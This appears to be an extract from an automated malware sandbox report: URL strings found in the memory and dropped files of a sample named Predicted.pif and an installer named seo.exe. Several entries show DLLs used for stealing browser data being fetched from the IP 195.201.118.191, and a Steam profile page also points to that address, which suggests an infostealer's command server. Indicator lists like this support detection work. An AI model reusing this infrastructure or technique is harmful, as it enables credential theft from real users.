Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr, mozglue.dll.18.dr, nss3.dll.18.dr, freebl3.dll.18.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr, mozglue.dll.18.dr, nss3.dll.18.dr, freebl3.dll.18.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr, mozglue.dll.18.dr, nss3.dll.18.dr, freebl3.dll.18.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr, mozglue.dll.18.dr, nss3.dll.18.dr, freebl3.dll.18.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr, mozglue.dll.18.dr, nss3.dll.18.dr, freebl3.dll.18.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr, mozglue.dll.18.dr, nss3.dll.18.dr, freebl3.dll.18.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr, mozglue.dll.18.dr, nss3.dll.18.dr, freebl3.dll.18.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr, mozglue.dll.18.dr, nss3.dll.18.dr, freebl3.dll.18.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: seo.exe, 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmp, seo.exe, 00000008.00000000.2344064575.0000000000408000.00000002.00000001.01000000.0000000A.sdmp, seo[1].exe.7.dr, seo.exe.7.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr, mozglue.dll.18.dr, nss3.dll.18.dr, freebl3.dll.18.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr, mozglue.dll.18.dr, nss3.dll.18.dr, freebl3.dll.18.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr, mozglue.dll.18.dr, nss3.dll.18.dr, freebl3.dll.18.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr, mozglue.dll.18.dr, nss3.dll.18.dr, freebl3.dll.18.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr, mozglue.dll.18.dr, nss3.dll.18.dr, freebl3.dll.18.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: seo[1].exe.7.dr, seo.exe.7.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: seo[1].exe.7.dr, seo.exe.7.dr	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: seo[1].exe.7.dr, seo.exe.7.dr	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: seo[1].exe.7.dr, seo.exe.7.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: Predicted.pif.9.dr, Determined.8.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Predicted.pif.9.dr, Determined.8.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Predicted.pif.9.dr, Determined.8.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: seo[1].exe.7.dr, seo.exe.7.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: seo[1].exe.7.dr, seo.exe.7.dr	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: Predicted.pif.9.dr, Determined.8.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: seo[1].exe.7.dr, seo.exe.7.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: Predicted.pif.9.dr, Determined.8.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: seo[1].exe.7.dr, seo.exe.7.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: seo[1].exe.7.dr, seo.exe.7.dr	String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreemen
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Predicted.pif, 00000012.00000000.2370851757.00000000002C9000.00000002.00000001.01000000.0000000B.sdmp, Predicted.pif.9.dr, Determined.8.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr, mozglue.dll.18.dr, nss3.dll.18.dr, freebl3.dll.18.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: Predicted.pif, 00000012.00000002.4100831968.000000006C04D000.00000002.00000001.01000000.0000000D.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.18.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: Predicted.pif, 00000012.00000002.4074056045.000000000CC0D000.00000002.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4074207582.000000000D00E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199751190313[1].htm.18.dr	String found in binary or memory: https://195.201.118.191
Source: Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://195.201.118.191/
Source: Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://195.201.118.191/:
Source: Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://195.201.118.191/freebl3.dllNh
Source: Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://195.201.118.191/freebl3.dllxh
Source: Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://195.201.118.191/mozglue.dll
Source: Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://195.201.118.191/mozglue.dllTh
Source: Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.118.191/msvcp140.dll
Source: Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://195.201.118.191/nss3.dll
Source: Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://195.201.118.191/nss3.dllZh
Source: Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.118.191/softokn3.dll
Source: Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://195.201.118.191/sqlr.dll
Source: Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://195.201.118.191/sqlr.dllfh
Source: Predicted.pif, 00000012.00000002.4067088704.00000000019EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://195.201.118.191/vcruntime140.dllB
Source: Predicted.pif, 00000012.00000002.4067088704.00000000019EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://195.201.118.191/vcruntime140.dllR
Source: Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://195.201.118.191GI
Source: CBGCAF.18.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 76561199751190313[1].htm.18.dr	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: Predicted.pif, 00000012.00000002.4067199541.0000000001B31000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067119650.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067119650.0000000001A4C000.00000004.00000800.00020000.00000000.sdmp, HDAAAA.18.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: Predicted.pif, 00000012.00000002.4067199541.0000000001B31000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067119650.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067119650.0000000001A4C000.00000004.00000800.00020000.00000000.sdmp, HDAAAA.18.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: CBGCAF.18.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: CBGCAF.18.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: CBGCAF.18.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=5iTMW1V3HmVR&a
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=oLfIUw8O
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=R0Sr
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=p7UJOiUOt47z&l=e
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: Predicted.pif, 00000012.00000002.4067199541.0000000001B31000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067119650.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067119650.0000000001A4C000.00000004.00000800.00020000.00000000.sdmp, HDAAAA.18.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: Predicted.pif, 00000012.00000002.4067199541.0000000001B31000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067119650.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067119650.0000000001A4C000.00000004.00000800.00020000.00000000.sdmp, HDAAAA.18.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: CBGCAF.18.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: CBGCAF.18.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: CBGCAF.18.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: HDAAAA.18.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr, mozglue.dll.18.dr, nss3.dll.18.dr, freebl3.dll.18.dr	String found in binary or memory: https://mozilla.org0/
Source: 76561199751190313[1].htm.18.dr	String found in binary or memory: https://steamcommunity.com/
